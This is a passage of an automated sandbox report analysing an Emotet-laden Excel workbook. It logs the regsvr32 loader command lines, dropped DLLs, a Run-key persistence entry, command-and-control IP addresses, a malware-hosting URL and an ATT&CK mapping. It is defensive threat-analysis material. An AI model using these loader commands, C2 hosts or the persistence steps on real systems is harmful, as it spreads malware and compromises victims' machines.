                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02034CA0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020410AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203D4B2
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020448B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020378B6
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020396B8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203EAC4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02048ECC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02031CCC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203B8D0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020498DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020338DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02037AF0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204B2F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020384F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020564F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02032B00
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203BD00
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02048D0C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203E708
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02045508
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02042110
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02045B18
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203871C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02043524
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02059124
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204B520
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02039D24
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204D32C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02032128
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02051728
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02053D28
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02055B28
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02045334
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204CF30
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02050930
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203A734
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02057348
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02034B4C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02040954
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02050D54
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204F550
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02036B5C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02031B5C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02048560
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02031364
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203FF64
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203C364
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203E368
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02059568
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204C974
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203E570
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203F174
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02048778
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02055D84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02042780
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02052B8C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204FB88
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02043B88
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02035590
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02047198
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02044FA4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02038FA0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020459A0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020497AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02041DAC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203D1AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020547B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020369C0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203D1C6
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203A1D4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204C1DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020379D8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203F3E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02043FE0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020499E8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020399EC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02039BEC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02047BF8
                        Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000000018002CA30 appears 48 times
                        Source: Untitled-09112022.xlsReversingLabs: Detection: 46%
                        Source: Untitled-09112022.xlsVirustotal: Detection: 61%
                        Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll"
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx
                        Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll"
                        Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\elv1.ooocccxxxJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR4AB5.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@12/10@5/53
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                        Source: Untitled-09112022.xlsOLE indicator, Workbook stream: true
                        Source: Untitled-09112022.xls.0.drOLE indicator, Workbook stream: true
                        Source: 4DF60000.0.drOLE indicator, Workbook stream: true
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02015DB4 CloseHandle,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                        Source: Untitled-09112022.xlsInitial sample: OLE indicators vbamacros = False
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800131BD push rdi; ret
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180013749 push rdi; ret
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02033A7E push ebp; ret
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201838C push eax; ret
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02033BE1 push ebp; ret
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202E0D3 push 09B8E1F7h; retf
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202E0E9 push 8B48E1F7h; retf
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02033127 push ebp; ret
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02032E55 push ebp; retf
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02032F5E push ebp; ret
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202E5C5 pushad ; ret
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021838C push eax; ret
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203838C push eax; ret
                        Source: Ji8QgmpX3lS3yT[1].dll.0.drStatic PE information: section name: _RDATA
                        Source: elv1.ooocccxxx.0.drStatic PE information: section name: _RDATA
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll"
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\elv1.ooocccxxxJump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dllJump to dropped file
                        Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\FgEHLIiiJRN\xoEOackyxDExhQ.dll (copy)Jump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\elv1.ooocccxxxJump to dropped file
                        Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\FgEHLIiiJRN\xoEOackyxDExhQ.dll (copy)Jump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\elv1.ooocccxxxJump to dropped file

                        Boot Survival

                        barindex
                        Creates an autostart registry key pointing to binary in C:\Windows
                        Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xoEOackyxDExhQ.dllJump to behavior
                        Drops PE files to the user root directory
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\elv1.ooocccxxxJump to dropped file
                        Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xoEOackyxDExhQ.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xoEOackyxDExhQ.dllJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Hides that the sample has been downloaded from the Internet (zone.identifier)
                        Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll:Zone.Identifier read attributes | delete
                        Source: C:\Windows\System32\regsvr32.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exe TID: 2888Thread sleep time: -120000s >= -30000s
                        Source: C:\Windows\System32\regsvr32.exe TID: 2888Thread sleep time: -60000s >= -30000s
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dllJump to dropped file
                        Source: C:\Windows\System32\regsvr32.exeAPI coverage: 9.1 %
                        Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformation
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029290 FindFirstFileExW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002972C FindFirstFileExW,FindNextFileW,FindClose,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028B30 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028B30 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021DA80 FindNextFileW,FindFirstFileW,FindClose,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203DA80 FindNextFileW,FindFirstFileW,FindClose,
                        Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180003460 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002DE88 GetProcessHeap,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180003460 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180003648 SetUnhandledExceptionFilter,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800156F8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180002E94 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 115.178.55.22 80
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.105.115.71 8080
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 218.38.121.17 443
                        Source: Yara matchFile source: C:\Users\user\Desktop\4DF60000, type: DROPPED
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll"
                        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: try_get_function,GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800243D0 cpuid
                        Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002D450 try_get_function,GetSystemTimeAsFileTime,

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Emotet
                        Source: Yara matchFile source: 0000000B.00000002.1193361768.00000000001EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1193452350.00000000002FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 11.2.regsvr32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.160000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.2b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.920122880.0000000002011000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.920051864.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1193389765.0000000000211000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1193544536.0000000002031000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1193348564.0000000000160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1193467860.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid Accounts2
                        Scripting                        		11
                        Registry Run Keys / Startup Folder                        		111
                        Process Injection                        		141
                        Masquerading                        		OS Credential Dumping1
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		Exfiltration Over Other Network Medium21
                        Encrypted Channel                        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default Accounts43
                        Exploitation for Client Execution                        		Boot or Logon Initialization Scripts11
                        Registry Run Keys / Startup Folder                        		1
                        Modify Registry                        		LSASS Memory12
                        Security Software Discovery                        		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth4
                        Ingress Tool Transfer                        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                        Virtualization/Sandbox Evasion                        		Security Account Manager1
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
                        Non-Application Layer Protocol                        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                        Process Injection                        		NTDS2
                        Process Discovery                        		Distributed Component Object ModelInput CaptureScheduled Transfer115
                        Application Layer Protocol                        		SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information                        		LSA Secrets2
                        File and Directory Discovery                        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.common2
                        Scripting                        		Cached Domain Credentials35
                        System Information Discovery                        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                        Hidden Files and Directories                        		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
                        Obfuscated Files or Information                        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                        Regsvr32                        		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 747191 Sample: Untitled-09112022.xls Startdate: 16/11/2022 Architecture: WINDOWS Score: 100 37 103.224.241.74 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India 2->37 39 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->39 41 44 other IPs or domains 2->41 57 Snort IDS alert for network traffic 2->57 59 Multi AV Scanner detection for domain / URL 2->59 61 Antivirus detection for URL or domain 2->61 63 10 other signatures 2->63 8 EXCEL.EXE 30 24 2->8         started        13 regsvr32.exe 2->13         started        signatures3 process4 dnsIp5 43 www.cecambrils.cat 8->43 45 www.hsweixintp.com 45.207.116.88, 49171, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 8->45 47 5 other IPs or domains 8->47 29 C:\Users\user\elv1.ooocccxxx, PE32+ 8->29 dropped 31 C:\Users\user\...\Ji8QgmpX3lS3yT[1].dll, PE32+ 8->31 dropped 33 C:\Users\user\Desktop\Untitled-09112022.xls, Composite 8->33 dropped 65 Document exploit detected (creates forbidden files) 8->65 67 Document exploit detected (UrlDownloadToFile) 8->67 15 regsvr32.exe 2 8->15         started        19 regsvr32.exe 8->19         started        21 regsvr32.exe 8->21         started        23 regsvr32.exe 8->23         started        69 System process connects to network (likely due to code injection or exploit) 13->69 file6 signatures7 process8 file9 35 C:\Windows\...\xoEOackyxDExhQ.dll (copy), PE32+ 15->35 dropped 55 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->55 25 regsvr32.exe 1 15->25         started        signatures10 process11 dnsIp12 49 218.38.121.17, 443, 49179, 49184 SKB-ASSKBroadbandCoLtdKR Korea Republic of 25->49 51 115.178.55.22, 49175, 49176, 49180 SIMAYA-AS-IDPTSimayaJejaringMandiriID Indonesia 25->51 53 172.105.115.71, 49177, 49178, 49182 LINODE-APLinodeLLCUS United States 25->53 71 Creates an autostart registry key pointing to binary in C:\Windows 25->71 signatures13

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        Untitled-09112022.xls46%ReversingLabsDocument-Excel.Trojan.Abracadabra
                        Untitled-09112022.xls61%VirustotalBrowse

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dll69%ReversingLabsWin64.Trojan.Emotet
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dll0%MetadefenderBrowse
                        C:\Users\user\elv1.ooocccxxx69%ReversingLabsWin64.Trojan.Emotet
                        C:\Users\user\elv1.ooocccxxx0%MetadefenderBrowse
                        C:\Windows\System32\FgEHLIiiJRN\xoEOackyxDExhQ.dll (copy)69%ReversingLabsWin64.Trojan.Emotet
                        C:\Windows\System32\FgEHLIiiJRN\xoEOackyxDExhQ.dll (copy)0%MetadefenderBrowse

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        11.2.regsvr32.exe.2b0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                        4.2.regsvr32.exe.4d0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                        6.2.regsvr32.exe.160000.0.unpack100%AviraHEUR/AGEN.1215461Download File

                        Domains

                        SourceDetectionScannerLabelLink
                        www.hsweixintp.com4%VirustotalBrowse
                        cecambrils.cat8%VirustotalBrowse
                        www.stickers-et-deco.com12%VirustotalBrowse
                        hsweixintp.com14%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                        http://ocsp.entrust.net030%URL Reputationsafe
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                        http://ocsp.entrust.net0D0%URL Reputationsafe
                        https://218.38.121.17/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/0%Avira URL Cloudsafe
                        https://218.38.121.17/kwxkonang/0%Avira URL Cloudsafe
                        http://www.cecambrils.cat/wp-content/cXEhHssszV/100%Avira URL Cloudmalware
